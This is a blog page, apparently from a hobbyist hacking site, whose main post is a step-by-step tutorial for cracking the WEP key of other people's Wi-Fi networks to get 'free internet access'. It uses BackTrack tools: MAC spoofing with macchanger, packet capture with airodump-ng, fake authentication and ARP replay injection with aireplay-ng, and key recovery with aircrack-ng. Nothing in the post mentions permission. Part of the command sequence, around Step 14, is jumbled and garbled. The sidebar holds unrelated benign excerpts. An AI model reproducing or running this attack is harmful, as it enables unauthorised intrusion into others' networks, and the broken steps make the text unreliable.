Skip to main content

Wi-Fi Network Hacking Free Internet access




This tutorial will explain that how to crack wep key using Backtrack..!!




Step 1:-First Download Backtrack  from the following link:http://www.remote-exploit.org/backtrack_download.htmlStep 2:-Burn the iso image on CD and boot your laptop from CD driveStep 3:-Select the third boot option(VESA/KDE).Step 4:-Once in BT3, click the tiny black box in the lower left corner to load up a  "Konsole" window.Step 5:-Type the following commandairmon-ngNote down the interface name. In this example wifi0Step 6:-airmon-ng stop wifi0Step 7:-ifconfig wifi0 downStep 8:-macchanger --mac 00:11:22:33:44:66 wifi0Step 9:-airmon-ng start wifi0Step 10:-airodump-ng wifi0This will start populating Wifi networks. Press Ctrl + C to stop.Check the network with WEP encryption.Notedown BSSID, CH and ESSID somewhere in notepad or paperNote that if the same BSSID is available in the second part with STATION associated with it,means you some one is accessing that network and our task will be little easier. If not than don’t worry we will still crack it.Step 11:-airodump-ng -c (channel) -w (file name)Replace(channel) with the CH which u had already n(file name) with any name of your choice(bssid) with the BSSID which u had already note--bssid (bssid) wifi0Note itLeave this console as it is and start new konsoleStep 12:-aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0If you don’t get Association Successful mesage then keep on trying untilyou got success.Step 13:-aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0Well if you don’t see ARP ACK and sent packets are not increasing or still 0 than it means no 1 isaccessing that network.But don’t worry you go an optional step,Leave this console as it is and start new kStep 14:-aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FFkonsolemessage than keep on trying until you get successgot an optional stepkonsole–b (bssid) –h 00:11:22:33:44:66 wfi0Press y and enterNow you will see that ARP and ACK packets in 2nd console are increasing fastKeep this console as it is and start 4th console.Step 15:-aircrack-ng -b (bssid) (filename)-Just wait and watch…..Backtrack will do rest of the work.Hurray we got the key.Done..!!


Comments

Popular Posts

Create Your Own Social Networking Site

Create Your Own Social Networking Site JCOW: Ethical Hacking Top 10 reasons to choose Jcow:- 1. Handle more traffic - Clean codes and Dynamic caching can lower the CPU load and  speed up your website. 2 Make your site more interactive - Well designed Jcow applications help you members to connect and communicate with others more effectively. 3 Add questions to the Registration Form - You can add new member fields, which will be displayed to the registration form, profile form, and the member browsing form. 4 Easily share stuff - Within the AJAX sharing Box, your members can publish status,  photos, videos, and blogs. 5 Customize and Extend your Jcow Network - A Jcow network consists of core apps(like "Friends" and "Messages") and optional apps(like "Blogs" and ""Videos"). You can enable/disable optional apps. You can also develop your own apps. 6 Every profile could be Unique - Members can customize their own profile theme and  add music play...

WRITE "I LOVE YOU" ON CMD BY USING NOTEPAD

I had previously posted about   Matrix effect   using Notepad   as well as cool batch file  programs. In this post i will share with you guys  the cool and awesome  Notepad Tricks .  As name suggest you don't require any program other then Notepad.  So lets get started. 1. Open  Notepad   and copy below code. @echo off color 0A :A echo IIIIIII     L      OOOOOO V           V  EEEEEE     Y       Y  OOOOOO  U     U  ping -a .9 >nul echo    I        L      O    O  V         V   E           Y     Y   O    O  U     U  ping -b .9 >nul  echo    I        L      O    O   V       V    E   ...

HL7V2.x to HL7V3.0 Translation Issues Details-2

In continuation of my previous post this post lists the other issues associated with HL7 v2.x to HL7v3 translation Conformance Patterns: The other major issue with the transformation of messages is the behavior of application when a particular information exchange takes place. In HL7V3.0 apart from the trigger events and interactions there exists the notion of application role as senders and receivers. The application role is characterized as the entire set of interactions for which the sender and receiver are responsible for transmitting. HL7V3.0 clearly defines the possible interactions and the application behavior associated these interactions in the form of responses for which the sender and receiver needs to adhere to. The differences in messages between V2.x and V3.0 and absence of clear guidance on V2.x regarding application behavior on receipt of message makes the transformation exercise more difficult. Vocabulary: It is a well known fact that 80% of HL7 V2.x message failu...